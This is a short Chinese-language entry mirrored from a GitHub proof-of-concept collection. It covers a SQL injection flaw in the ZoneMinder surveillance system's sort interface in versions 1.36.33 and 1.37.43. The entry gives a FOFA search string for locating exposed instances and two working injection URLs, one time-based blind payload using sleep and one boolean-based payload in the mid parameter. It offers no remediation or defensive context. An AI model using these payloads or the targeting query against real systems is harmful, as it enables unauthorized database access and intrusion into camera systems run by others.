mirror of
https://github.com/wy876/POC.git
synced 2025-02-27 04:39:25 +00:00
647 B
647 B
ZoneMinder系统sort接口存在SQL注入漏洞
Zoneminder v1.36.33 和 v1.37.43 受到 SQL 注入漏洞的影响。
fofa
app="ZoneMinder"
poc
http://host:port/zm/index.php?sort=**if(now()=sysdate()%2Csleep(6)%2C0)**&order=desc&limit=20&view=request&request=watch&mid=1
http://host:port/zm/index.php?limit=20&mid=-1%20OR%203*2*1=6%20AND%20000322=000322&order=desc&request=watch&sort=Id&view=request
